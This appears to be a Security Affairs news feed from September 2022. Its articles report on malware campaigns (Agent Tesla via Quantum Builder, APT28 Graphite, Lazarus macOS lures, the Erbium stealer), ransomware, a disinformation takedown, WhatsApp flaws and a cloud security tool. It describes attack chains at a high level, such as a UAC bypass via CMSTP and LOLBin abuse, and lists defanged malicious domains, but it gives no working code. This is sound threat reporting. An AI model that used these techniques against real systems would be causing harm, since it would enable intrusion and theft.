🔒
There are new articles available, click to refresh the page.
Before yesterdaySecurity Affairs

Threat actors use Quantum Builder to deliver Agent Tesla malware

28 September 2022 at 15:43

The recently discovered malware builder Quantum Builder is being used by threat actors to deliver the Agent Tesla RAT.

A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT), Zscaler ThreatLabz researchers warn.

“Quantum Builder (aka “Quantum Lnk Builder”) is used to create malicious shortcut files. It has been linked to the Lazarus Group APT due to shared TTPs and source code overlaps, but we cannot confidently attribute this campaign to any specific threat actor.” reads the report published by Zscaler. “In this campaign, threat actor use Quantum Builder to generate malicious LNK, HTA, and PowerShell payloads which then deliver Agent Tesla on the targeted machines.”

The Quantum Builder (aka “Quantum Lnk Builder”) allows to create malicious shortcut files, it is sold on the dark web. The Quantum Builder also allows to generate malicious HTA, ISO, and PowerShell payloads that are used to drop the next-stage malware.

In the campaign observed by the experts, threat actors used the builder to generate malicious LNK, HTA, and PowerShell payloads which is used to deliver Agent Tesla on the targeted machines.

Experts noticed that this campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to past attacks.

The attack chain observed by ZScaler starts with a spear phishing email which consists of a LNK File bundled as a GZIP Archive. The messages are masqueraded as order confirmation message from a Chinese supplier of lump and rock sugar, with the LNK file concealed as a PDF document.

Quantum Builder message

Upon execution of the LNK File, the embedded PowerShell code spawns MSHTA which then executes an HTA File that is hosted on a remote server. 

The HTA File then decrypts a PowerShell loader script which decrypts and loads another PowerShell script after performing AES Decryption and GZIP Decompression. The decrypted PowerShell script is the Downloader PS Script, which downloads and executes the Agent Tesla binary from a remote server. The malware is executed with administrative privileges by performing a UAC Bypass using the CMSTP. 

Quantum Builder

Below are the Key Features of this attack:

  • The threat actors are evolving their tactics by incorporating new infection chains for delivering Agent Tesla on target machines by leveraging the LNK and HTA payloads generated by a builder dubbed “Quantum Builder”
  • The Quantum Builder is a builder sold in the cybercrime marketplace and is capable of generating LNK, HTA, and ISO payloads consisting of sophisticated techniques to download and execute the final payload with a Multi-Staged attack Chain.
  • The In-memory PowerShell scripts decrypted by Quantum Builder-generated HTA file perform User Account Control (UAC) Bypass via CMSTP in order to execute the final payload (Agent Tesla) with Administrative rights. UAC Bypass is also used to perform Windows Defender exclusions on the endpoint system.
  • Utilizes Living Off the Land Binaries (LOLBins) to evade detections and camouflage the malicious activity.
  • Incorporates techniques like Decoys, UAC Prompts and In-memory PowerShell to execute the final payload. These Techniques are regularly updated by the Developers of the Quantum Builder. 

In a second variant of the infection sequence, the GZIP archive is replaced by a ZIP file, while also adopting further obfuscation strategies to camouflage the malicious activity.

Quantum Builder has witnessed a surge in usage in recent months, with threat actors using it to distribute a variety of malware, such as RedLine Stealer, IcedID, GuLoader, RemcosRAT, and AsyncRAT.

“Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations.” concludes the report. “It incorporates sophisticated techniques to evade detections, and the techniques are updated regularly by the developers. “

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Agent Tesla)

The post Threat actors use Quantum Builder to deliver Agent Tesla malware appeared first on Security Affairs.

ONLINE DISINFORMATION: Under the hood of a Doppelgänger

28 September 2022 at 14:03

ONLINE DISINFORMATION is one of the defining issues of our time and the influence of fake news has become an acute threat to our society.

Disinformation undermines true journalism and steers the public opinion in highly charged topics such as immigration, climate change, armed conflicts or refugee and health crises. Social media platforms are the battlefield of disinformation.

The war in Ukraine is no exception. This investigation presents how a large disinformation campaign targeting European audience with pro-Russian propaganda was active in social media for months. What started as an investigation of media clones of the German Der Spiegel, Bild and T-Online turned out to be a fascinating dive into the multimedia world of disinformation production.

Tracing the infrastructure of a few websites helped us to discover dozens of websites spreading Russian propaganda related to the war in Ukraine. The campaign undermined the Ukrainian government, its citizens, and Western governments supporting Ukraine and supported the lift of sanctions against Russia.

Qurium’s infrastructure research does not only show how European infrastructure has been used to host the fake news sites, but also how new domains have been registered to keep the campaign running in the very same physical servers.

Qurium’s investigation is the result of a collaboration with EU DisinfoLab, an independent non-profit organization focused on tackling sophisticated disinformation campaigns targeting the EU. Qurium has focused on the technical aspects of the campaign.

Qurium forensics report:
Under the hood of a Doppelgänger

EU DisinfoLab report:
Doppelganger

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Disinformation)

The post ONLINE DISINFORMATION: Under the hood of a Doppelgänger appeared first on Security Affairs.

APT28 relies on PowerPoint Mouseover to deliver Graphite malware

28 September 2022 at 13:47

The Russia-linked APT28 group is using mouse movement in decoy Microsoft PowerPoint documents to distribute malware.

The Russia-linked APT28 employed a technique relying on mouse movement in decoy Microsoft PowerPoint documents to deploy malware, researchers from Cluster25 reported.

Cluster25 researchers were analyzing a lure PowerPoint document used to deliver a variant of Graphite malware, which is known to be used exclusively by the APT28 group, that starts the attack chain when the user starts the presentation mode and moves the mouse.

The user action starts the execution of a PowerShell script designed to download and run a dropper from OneDrive.

“The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive. The latter downloads a payload that extracts and injects in itself a new PE (Portable Executable) file, that the analysis showed to be a variant of a malware family known as Graphite, that uses the Microsoft Graph API and OneDrive for C&C communications.” reads the analysis published by Cluster25.

The lure document used a template potentially linked to The Organisation for Economic Co-operation and Development (OECD), it contains two slides, written in English and French respectively, with the same content.

APT28

The dropper appears as a file with a JPEG extension (DSC0002.jpeg), it is a DLL file that is later decrypted and written to C:\ProgramData\lmapi2.dll.

The last stage malware is a version of Graphite, it communicates with the C2 servers through the domain graph[.]Microsoft[.]com, (i.e. abusing the Microsoft Graph service) and OneDrive.

The Graphite is a fileless malware that is deployed in-memory only and is used by threat actors to deliver post-exploitation frameworks like Empire.

The analysis of metadata revealed that the nation-state actors employed them in a campaign between January and February 2022. However, the researchers noticed that URLs used in the attacks appeared still active in August and September, a circumstance that suggests the campaign is still ongoing.

Potential targets of the campaign are organizations and individuals operating in the defense and government sectors of countries in Europe and Eastern Europe.

“Such recent evidence could suggest some sort of activities still ongoing linked to the described threat or to some of its variants. Finally, based on several indicators, geopolitical objectives and the analyzed artifacts, Cluster25 attributes this campaign to the Russia-linked threat actor known as APT28 (aka Fancy Bear, TSAR Team, Pawn Storm, Sednit) and indicates entities and individuals operating in the defense and government sectors of Europe and Eastern Europe countries as potential targets.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, APT)

The post APT28 relies on PowerPoint Mouseover to deliver Graphite malware appeared first on Security Affairs.

Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks

28 September 2022 at 10:35

The recently born Bl00Dy Ransomware gang has started using the recently leaked LockBit ransomware builder in attacks in the wild.

The Bl00Dy Ransomware gang is the first group that started using the recently leaked LockBit ransomware builder in attacks in the wild.

Last week, an alleged disgruntled developer leaked the builder for the latest encryptor of the LockBit ransomware gang.

The latest version of the encryptor, version 3.0, was released by the gang in June. According to the gang, LockBit 3.0 has important novelties such as a bug bounty program, Zcash payment, and new extortion tactics. The gang has been active since at least 2019 and today it is one of the most active ransomware gangs.

The code of the encryptor was leaked on Twitter by at least a couple of accounts, @ali_qushji and @protonleaks1.

Unknown person @ali_qushji said his team has hacked the LockBit servers and found the possible builder of LockBit Black (3.0) Ransomware. You can check it on the GitHub repository https://t.co/wkaTaGA8y7 pic.twitter.com/cPSYipyIgs

— 3xp0rt (@3xp0rtblog) September 21, 2022

The builder is contained in a password-protected 7z archive, “LockBit3Builder.7z,” containing:

  • Build.bat;
  • builder.exe;
  • config.json;
  • keygen.exe.

The availability of the builder could allow any threat actor to create its own version of the ransomware customizing it by modifying the configuration file.

Now BleepingComputer first reported that the Bl00Dy Ransomware group started using the Lockbit 3.0 builder to create its own ransomware.

The group in past attacks created its own malware by using leaked builders, such as Babuk and Conti.

Early this week, the researcher Vladislav Radetskiy reported the discovery of a new Bl00Dy Ransomware Gang encryptor that was employed in an attack on a Ukrainian organization. The researchers did not immediately identify the ransomware involved in the attack, it appeared as Conti or LockBit.

Just in case someone will want to know a little bit more about #Bl00dy #Ransomware TTP`s.
Here my unfinished report (in English)https://t.co/DN0CMiuvo8@vxunderground @malwrhunterteam @James_inthe_box @VK_Intel @TrellixLabs @AdvIntel @demonslay335 @ChristiaanBeek

— VR (@angel11VR) September 26, 2022

MalwareHunterTeam researchers confirmed that the encryptor used in the attack by the Bl00Dy Ransomware group was built using the leaked LockBit 3.0 builder.

So, there is already a ransomware gang that started using the leaked LockBit 3.0 builder: "BL00DY RANSOMWARE GANG".
😫 https://t.co/0uUBYIH7kq pic.twitter.com/Egv88ZY22w

— MalwareHunterTeam (@malwrhunterteam) September 26, 2022

BleepingComputer researchers, who tested the Bl00dy Ransomware Gang’s encrypter, confirmed that it was generated with the leaked LockBit 3.0. builder.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Bl00Dy Ransomware)

The post Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks appeared first on Security Affairs.

NUVOLA: the new Cloud Security tool

28 September 2022 at 08:26

nuvola is the new open-source cloud security tool to address the privilege escalation in cloud environments.

nuvola is the new open source security tool made by the Italian cyber security researcher Edoardo Rosa (@_notdodo_), Security Engineer at Prima Assicurazioni. The tool was released during the RomHack 2022 security conference in Rome. The tool helps the security community to address the complex topic of privilege escalation on cloud environments such as AWS.

The Privilege Escalations Drama

Privilege escalation is one common practice used by bad actors to gain entry into your most sensitive systems. They may start with a low-level account, but they exploit permissions and pathways to work themselves up to an intimidating level of privilege where they’re poised to cause irreparable damage and also gain persistence or lockdown the account.

Forrester estimated that 80% of security breaches involve privileged credentials. Many organizations have adopted cloud with such enthusiasm that they’ve failed to cover the fundamentals in security leaving many gaps for bad actors to find their way in.

Just like other forms of attacks, privilege escalation can go unnoticed, especially in a complex cloud environment where companies already have difficulty gaining visibility into their internal users, identities, and actions. A bad actor could spend days, if not weeks, inside your systems and you may not even know it. They could even expose sensitive data and, like in 50% of cases, you might be completely unaware of the breach until a third party informs you of it.

When it comes to AWS security, Identity and Access Management (IAM) permission misconfigurations have long held a spotlight, but that doesn’t mean they’re any easier to avoid. In reality, preventing privilege escalation begins with making it as difficult as possible applying the principle of least privilege.

Still, with common configuration issues and other vulnerabilities becoming commonplace in AWS architecture, it’s important to understand how bad actors could exploit our environments by understanding the most common AWS privilege escalations used.

Cloud Security Context

Cloud is a continuously evolving space with new services, strategies, and technologies springing up seemingly overnight. Due to this, organizations regularly change and adapt their approach to cloud and cloud security.

A report from the Cloud Security Alliance (Technology and Cloud Security Maturity, 2022) states that 84% of organizations report having no automation; since Identity and Access Management is a key factor in securing companies, automating the detection of possible attack paths may reduce the attack surface and avoid potential data breaches.

Beyond the technological aspects, another compendium of Cloud Security Alliance (The State of Cloud Security Risk, Compliance, and Misconfigurations, 2022) states that the lack of knowledge and expertise are well-known issues within the information security industry.

It is no surprise then, that lack of knowledge and expertise was consistently identified as:

  • the primary barrier to general cloud security (59%)
  • the primary cause of misconfigurations (62%)
  • a barrier to proactively preventing or fixing misconfigurations (59%)
  • the primary barrier to implementing auto-remediation (56%)

Also, from the same report, the primary reason organizations state for having a security incident due to misconfigurations is lack of visibility (68%).

A global overview is vital for both an attacker and a defender because it allows both security analysts and attackers to immediately find attack paths to remediate or abuse the system.

A full understanding of the environment from a high-level enables companies to establish priorities and fulfill security requirements.

While IAM security is security is very important an attacker may also abuse misconfigurations on the environment like exposed resources (Alteryx, Twilio) or services; a Cloud Security Posture Management (CSPM) can help companies securing their asset defining standard controls (CIS, PCI, NIST, SOC2) and custom ruleset to avoid false positives or increase detection of security issues.

While some tools that support AWS are very useful and greatly developed, many of them lack a global overview or features and the results must be manually reviewed, aggregated and ingested in other tools or custom scripts.

Entering nuvola

nuvola (with the lowercase n) is a tool to dump and perform automatic and manual security analysis on AWS environments configurations and services using predefined, extensible and custom rules created using graphs and a simple Yaml syntax.

The general idea behind this project is to create an abstracted digital twin of a cloud platform. For a more concrete example: nuvola reflects the BloodHound traits used for Active Directory analysis but on cloud environments.

The usage of a graph database also increases the possibility of finding different and innovative attack paths and can be used as an offline, centralized and lightweight digital twin.

Like BloodHound, nuvola uses the advantages and principles of the graph theory (implemented in the Neo4j graph database) to discover, and reveal relationships between objects within a cloud ecosystem enabling the engineers to perform analysis.

nuvola

Since Prima Assicurazioni believes in open source, the tool it’s created with a community mindset and without custom or specific constraints to help us and other companies secure the AWS ecosystems. The tool also supports the creation of detection rules using YAML files to help experts and non-experts to contribute to the project.

For example using nuvola we can define a Yaml file to find all EC2 instances with the metadata endpoint not upgraded to v2. The syntax is easier that the one offered by Cypher, the query engine for Neo4j, allowing even non-hardcore analyst to perform assessments.

nuvola

Figure. Output of a query to find vulnerable EC2 instances

The main advantage of using graphs is that we are able to find paths: from A to B.

We can find at vulnerable path using a Yaml file to query all paths from all users or roles to a target; in this case the policy called AdministratorAccess; abusing the actions PassRole and CreateStack.

nuvola

Figure. List of AWS roles which can perform privilege escalation to administrator

The output shown in the above image states that cloudformation-deployer role can reach the policy AdministratorAccess; as well as the role temp-backend-api-role-runner.

The nuvola source code is available on GitHub.  For further technical details about the inner working and the usage of the tool check the project wiki and RomHack 2022 slide deck.

About the author: Luca Mella, Cyber Security Expert, Response & Threat Intel | Manager

In 2019, Luca was mentioned as one of the “32 Influential Malware Research Professionals”. He is a former member of the ANeSeC CTF team, one of the firsts Italian cyber war-game teams born back in 2011.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, cloud computing)

The post NUVOLA: the new Cloud Security tool appeared first on Security Affairs.

Meta dismantled the largest Russian network since the war in Ukraine began

28 September 2022 at 07:43

Meta dismantled a network of Facebook and Instagram accounts spreading disinformation across European countries.

Meta announced to have taken down a huge Russian network of Facebook and Instagram accounts used to spread disinformation published on more than 60 websites impersonating news organizations across Europe. The disinformation operation began in May 2022, the network targeted primarily Germany, France, Italy, Ukraine and the UK, it was spreading fake content related to the war in Ukraine and its impact in Europe. Meta pointed out that this is the largest and most complex Russian operation they’ve disrupted since the war in Ukraine began.

The shared articles criticized Ukraine and Ukrainian refugees, applauded Russia, and argued that Western sanctions on Russia would backfire.

“We took down a large network that originated in Russia and targeted primarily Germany, and also France, Italy, Ukraine and the United Kingdom. The operation began in May of this year and centered around a sprawling network of over 60 websites carefully impersonating legitimate news organizations in Europe, including Spiegel, The Guardian, Bild and ANSA.” reads the report published by Meta.

“There, they would post original articles that criticized Ukraine and Ukrainian refugees, supported Russia and argued that Western sanctions on Russia would backfire.”

Meta Russia disinformation

Below is a list of domains used to impersonate legitimate news organizations:

  • Avisindependent[.]eu 6/3/2022 France
  • bild[.]pics 6/6/2022 Germany
  • rrn[.]world 6/6/2022 Multiple
  • dailymail[.]top 6/10/2022 UK
  • repubblica[.]life 6/13/2022 Italy
  • delfi[.]life 6/15/2022 Latvia
  • dailymail[.]cam 6/23/2022 UK
  • dailymail[.]cfd 6/23/2022 UK
  • 20minuts[.]com 6/28/2022 France
  • ansa[.]ltd 6/28/2022 Italy
  • spiegel[.]ltd 6/29/2022 Germany
  • theguardian[.]co[.]com 7/7/2022 UK

Threat actors behind this operation promoted the articles and also original memes and YouTube videos across many internet services, including Facebook, Instagram, Telegram, Twitter, petitions websites Change.org and Avaaz, and even LiveJournal.

“The amplification on social media, on the other hand, relied primarily on crude ads and fake accounts. In fact, on our platforms, the majority of the accounts, Pages and ads were detected and removed by our automated systems before we even began our investigation.” continues the report. “Together, these two approaches worked as an attempted smash-and-grab against the information environment, rather than a serious effort to occupy it long-term.”

Meta shared some numbers related to this campaign:

  • Presence on Facebook and Instagram: 1,633 accounts, 703 Pages, one Group and 29 accounts on Instagram.
  • Followers: About 4,000 accounts followed one or more of these Pages, less than 10 accounts joined this Group and about 1,500 accounts followed one or more of these Instagram accounts.
  • Advertising: Around $105,000 in spending for ads on Facebook and Instagram, paid for primarily in US dollars and euros.

Meta also disrupted for the first time a Chinese network focused on U.S. domestic politics. The Chinese-origin influence operation also targeted the Czech Republic. It ran across Facebook, Instagram, Twitter, and also two petition platforms in Czechia.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, disinformation)

The post Meta dismantled the largest Russian network since the war in Ukraine began appeared first on Security Affairs.

North Korea-linked Lazarus continues to target job seekers with macOS malware

27 September 2022 at 20:39

North Korea-linked Lazarus APT group is targeting macOS Users searching for jobs in the cryptocurrency industry.

North Korea-linked Lazarus APT group continues to target macOS with a malware campaign using job opportunities as a lure. The attackers aimed at stealing credentials for the victims’ wallets.

Last week, SentinelOne researchers discovered a decoy documents advertising positions for the popular cryptocurrency exchange Crypto.com.

The SentinelOne investigation is based on a previous one conducted by ESET in August, when Lazarus APT has been observed targeting job seekers with macOS malware working also on Intel and M1 chipsets.

ESET published a series of tweets detailing the attacks, the experts spotted a signed Mac executable disguised as a job description for Coinbase. The malicious code was uploaded to VirusTotal from Brazil on August 11, 2022.

Lazarus APT has used this kind of lures in multiple campaigns since at least 2020, including a campaign dubbed ‘Operation Dream Job’.

The researchers have no evidence on how the malware is being distributed, but earlier reports on Operation In(ter)ception suggested that the threat actors initially established a contact with the victims via targeted messaging on LinkedIn.

The first stage dropper employed in the latest campaign is a Mach-O binary that is a similar template to the safarifontsagent binary used in the Coinbase attacks.

The dropper launches the decoy PDF file, a 26 page document containing all vacancies at Crypto.com, and wipes the Terminal’s current savedState (“com.apple.Terminal.savedState”).

The second stage in the Crypto.com variant is a bare-bones application bundle named “WifiAnalyticsServ.app”, it mirrors the same architecture employed in the Coinbase campaign.

The second-stage malware extracts and executes the third-stage binary.

“The main purpose of the second-stage is to extract and execute the third-stage binary, wifianalyticsagent. This functions as a downloader from a C2 server. The Coinbase variant used the domain concrecapital[.]com.” reads the analysis published by SentinelOne. “In the Crypto.com sample, this has changed to market.contradecapital[.]com.”

The experts were not able to determine the last-stage payload because the C2 server responsible for hosting the malware was offline at the time of the analysis.

Lazarus job seekers attack
Hardcoded C2 in the third-stage downloader (Source SentinelOne)

Experts pointed out that the threat actors have made no effort to encrypt or obfuscate the binaries employed in the attacks, a circumstance that indicates the attackers were conducting short-term campaigns and/or little fear of detection by their targets. 

“The Lazarus (aka Nukesped) threat actor continues to target individuals involved in cryptocurrency exchanges. This has been a long-running theme going as far back as the AppleJeus campaigns that began in 2018. Operation In(ter)ception appears to be extending the targets from users of crypto exchange platforms to their employees in what may be a combined effort to conduct both espionage and cryptocurrency theft.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Lazarus)

The post North Korea-linked Lazarus continues to target job seekers with macOS malware appeared first on Security Affairs.

Defense firm Elbit Systems of America discloses data breach

27 September 2022 at 15:37

Elbit Systems of America, a subsidiary of defense giant Elbit Systems, disclosed a data breach after Black Basta ransomware gang claimed to have hacked it.

In late June, the Black Basta ransomware gang claimed to have hacked Elbit Systems of America, the extortion group added the name of the company to its Tor leak site. Elbit Systems of America, LLC is a U.S.-based wholly owned subsidiary of Elbit Systems Ltd., a leading global source of innovative, technology based systems for diverse defense and commercial applications.

Now the company has confirmed the data breach that took place on June 8, 2022 and impacted 369 people.

The company discovered the security breach after noticing unusual activity on its network, in response to the intrusion it shut down its systems to prevent the threat from spreading.

“On June 8, 2022, Elbit America discovered unusual activity in its network environment. Elbit America
immediately shut down its network and took steps to secure its environment. Elbit America also
engaged a leading, independent cybersecurity firm to assist Elbit America with safely restoring its
operations, to investigate the incident, and to determine if any personal information was affected as
quickly as possible.” reads the data breach notification sent to the Maine Attorney General’s office. “Through this investigation, on June 15, 2022, Elbit America learned that personal information belonging to certain employees may have been acquired without authorization. Out of an abundance of caution, Elbit America notified all employees on July 1, 2022, including four (4) Maine
residents.”

Exposed data may have included individuals’ names, addresses, Social Security numbers, dates of birth, direct deposit information, and ethnicity.

The company already notified impacted individuals and is offering them 12 months of free identity protection and credit monitoring services.

Some of the documents published by the Black Basta gang on its leak site as proof of the hack included, an audit report, confidentiality agreements, and a payroll report

Black Basta has been active since April 2022, like other ransomware operations, it implements a double-extortion attack model.  

The ransomware appends the .basta extension to the encrypted filenames and create ransom notes named readme.txt in each folder.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Elbit Systems of America)

The post Defense firm Elbit Systems of America discloses data breach appeared first on Security Affairs.

WhatsApp fixed critical and high severy vulnerabilities

27 September 2022 at 13:13

WhatsApp has addressed two severe Remote Code Execution vulnerabilities affecting the mobile version of the software.

WhatsApp has published three security advisories for 2022, two of which are related to CVE-2021-24042 and CVE-2021-24043 vulnerabilities discovered in January and February, and the third one is related to CVE-2022-36934 and CVE-2022-27492 fixed by the company in September.

The CVE-2022-36934 (CVSS score 9.8) flaw is an integer overflow in the app for Android that impacts versions prior to v2.22.16.12, Business for Android prior to v2.22.16.12, iOS prior to v2.22.16.12, Business for iOS prior to v2.22.16.12. An attacker can exploit the flaw to achieve remote code execution in an established video call.

“This RCE bug affects a piece of code in the WhatsApp component Video Call Handler, which allows an attacker to manipulate the bug to trigger a heap-based buffer overflow and take complete control of WhatsApp Messenger.” reads a post published by MalwareBytes.

whatsapp undisclosed flaws

The CVE-2022-27492 (CVSS score 7.8) is an integer underflow in WhatsApp for Android, it impacts versions prior to v2.22.16.2, WhatsApp for iOS v2.22.15.9. An attacker can gain remote code execution by sending to the victims a crafted video file.

“This RCE bug affects an unspecified code block of the component Video File Handler. The manipulation with an unknown input leads to a memory corruption vulnerability. To exploit this vulnerability, attackers would have to drop a crafted video file on the user’s WhatsApp messenger and convince the user to play it.” states MalwareBytes.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, RCE)

The post WhatsApp fixed critical and high severy vulnerabilities appeared first on Security Affairs.

Erbium info-stealing malware, a new option in the threat landscape

27 September 2022 at 09:40

The recently discovered Erbium information-stealer is being distributed as fake cracks and cheats for popular video games.

Threat actors behind the new ‘Erbium’ information-stealing malware are distributing it as fake cracks and cheats for popular video games to steal victims’ credentials and cryptocurrency wallets.

The Erbium info-stealing malware was first spotted by researchers at threat intelligence firm Cluster25 on July 21, 2022. The Malware-as-a-Service (MaaS) was advertised on a Dark Web forum by a Russian-speaking threat actor.

The author said that he spent several months developing Erbium which supports unique functionalities. According to cybersecurity firm Cyfirma, the Erbium Stealer supports the following capabilities:

  • Ability to enumerate drives.
  • Ability to enumerate paths, files, and folders.
  • Capability to load other libraries, processes, and DLLs in memory.
  • Ability to Gather System Information.
  • Network communication capability.
  • Collecting user credentials, such as passwords, from a range of popular chat and email programs, as well as web browsers.
  • Ability to obtain information from various installed applications.
  • Ability to obtain cryptocurrency wallet information [log-in credentials and stored funds].
  • Ability to collect data of Authentication (2FA) and password-managing software.

“Recently CYFIRMA’s research team detected a new sample of Erbium stealer in wild. We observed one of the recent gaming campaigns where the threat actors lure gamers/players who want to acquire an unfair or prohibited edge over other players with the malicious binary posted on MediaFire [free service for file hosting].” states CYFIRMA. “Threat actors are spreading this malware using drive-by-download techniques and pretending as cracked software/game hacks.”

Experts at Cyfirma recently analyzed a new sample Erbium stealer in the wild targeting gamers and players. Threat actors were offering to the gamers malicious binaries masquerading as software that can give them a prohibited edge over other players.

Initially, the malware was sold at a price ranging between 9 to 150 dollars depending on the subscription plan that goes from one week to one year of license. Starting from July, the authors significantly increased the price which ranges from 100 dollars up to a thousand dollars for a one-year subscription and access to a control panel.

erbium control_panel-1

Cluster25 researchers discovered that the malware is administered through a Telegram bot.

The malware can harvest the following information from the victim systems:

  • Desktop screenshot from all monitors.
  • System information (CPU, GPU, DISK, RAM, number of monitors, monitor resolutions, monitor resolutions, MAC, Windows version, Windows owner, PC name, PC architecture, Windows license key)
  • Passwords, cookies, history, maps, autofill from most popular browsers based on Gecko and Chromium
  • Cold wallets from browsers (MetaMask, TronLink, Binance Chain Wallet, Yoroi, Nifty Wallet, Math Wallet, Coinbase Wallet, Guarda, EQUAL Wallet, Jaxx Liberty, BitApp Wallet, iWallet, Wombat, MEW CX, GuildWallet, Saturn Wallet, Ronin Wallet, NeoLine, Clover Wallet, Liquality Wallet, Terra Station, Keplr, Sollet, Auro Wallet, Polymesh Wallet, ICONex, Nabox Wallet, KHC, Temple, TezBox, Cyano Wallet, Byone, OneKey, LeafWallet, DAppPlay, BitClip, Steem Keychain, Nash Extension , Hycon Lite Client, ZilPay, Coin98 Wallet, Harmony, KardiaChain, Rabby, Phantom, TON Crystal Wallet)
  • Other browser plugins (Authenticator, Authy, Trezor Password Manager, GAuth Authenticator, EOS Authenticator)
  • Steam (list of accounts and authorization files)
  • Discord (tokens)
  • FTP clients (FileZilla, Total Commander)
  • Telegram (authorization files)
  • Cold desktop wallets (Exodus, Atomic, Armory, Bitecoin-Core, Bytecoin, Dash-Core, Electrum, Electron, Coinomi, Ethereum, Litecoin-Core, Monero-Core, Zcash, Jaxx)

“Erbium is an info-stealer capable of strongly impacting the confidentiality and integrity of the data and information contained in the systems it affects and is an example of how the panorama of malicious tools is constantly evolving, offering proposals that are increasingly within reach of all, in consideration of the low selling prices.” says Emanuele De Lucia, Director of Cyber Intelligence presso Cluster25.

According to Cluster25 visibility, the malware has already infected systems in multiple countries, including the USA, France, Colombia, Spain, Italy, India, Vietnam, and Malaysia.

“Cyber-crime is constantly evolving within an underground market where it is not uncommon to come across new proposals for the purchase of MaaS solutions. In Cluster25’s opinion Erbium could become one of the most used infostealers by cyber criminals due to its wide range of capabilities and due to the growing demand for MaaS.” concludes Cluster25.

Both Cluster25 and Cyfirma shared Indicators of Compromise (IoCs) for this threat.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Erbium stealer)

The post Erbium info-stealing malware, a new option in the threat landscape appeared first on Security Affairs.

Mandiant identifies 3 hacktivist groups working in support of Russia

27 September 2022 at 07:57

Researchers are tracking multiple self-proclaimed hacktivist groups working in support of Russia, and identified 3 groups linked to the GRU.

Mandiant researchers are tracking multiple self-proclaimed hacktivist groups working in support of Russia, and identified 3 groups linked to the Russian Main Intelligence Directorate (GRU).

gru Russia linked hacktivists

The experts assess with moderate confidence that moderators of the purported hacktivist Telegram channels “XakNet Team,” “Infoccentr,” and “CyberArmyofRussia_Reborn” are coordinating their operations under the control of the GRU.

The so-called hacktivist groups conducted distributed denial-of-service (DDoS) and defacement attacks against Ukrainian websites, but the experts believe that they are a front for information operations and destructive cyber activities coordinated by the Kremlin.

The experts discovered that some APT28 tools were used to compromise the networks of Ukrainian victims, whose data was subsequently leaked on Telegram within 24 hours of wiping activity by APT28.

The APT28 group (aka Fancy BearPawn StormSofacy GroupSednit, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).

Most of APT28s’ campaigns leveraged spear-phishing and malware-based attacks.

Mandiant identified at least 16 data leaks from threat actors claiming to be hacktivists, four of which coincided with wiping attacks conducted by Russia-linked cyberespionage group APT28.

“Mandiant has only observed the use of CADDYWIPER and ARGUEPATCH by APT28, although we note that others have publicly attributed some CADDYWIPER deployments to Sandworm.” reads the report published by Mandiant. “In two incidents, Mandiant observed APT28 conduct wiper attacks, which were followed, within 24 hours, by data from the victims being leaked on Telegram. In both instances APT28 deployed ARGUEPATCH, which dropped CADDYWIPER.”

Mandiant researchers are not able to determine the composition of these groups and their exact degree of affiliation with Russian military intelligence. 

“While the exact nature of the relationship is unclear” states the report, “it likely falls into one of two general possibilities:

  • GRU officers may directly control the infrastructure associated with these actors and their activities may be a front for GRU operations, similar to the relationship between the GRU and the false persona Guccifer 2.0.
  • The moderators respectively running these Telegram channels may directly coordinate with the GRU; however, the moderators may be Russian citizens who are not Russian intelligence officers. There are multiple possible configurations through which this dynamic could manifest, including but not limited to initial GRU support for third parties to establish the channels or subsequent links established after initial channel creation. 

Experts believe that the moderators of the XakNet Team channel are directly supported by APT28, based on XakNet’s leak of a technical artifact APT28 used in the compromise of a Ukrainian network. The unique nature of this technical artifact suggests that the moderators of XakNet Team either are GRU intelligence officers or work directly with the GRU APT28 operators.

“Russia’s February 2022 invasion of Ukraine created unprecedented circumstances for cyber threat activity. This likely is the first instance in which a major cyber power potentially has conducted disruptive attacks, espionage, and information operations concurrently with widespread, kinetic military operations in a conventional war.” Mandiant concludes.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Russia)

The post Mandiant identifies 3 hacktivist groups working in support of Russia appeared first on Security Affairs.

  • There are no more articles
❌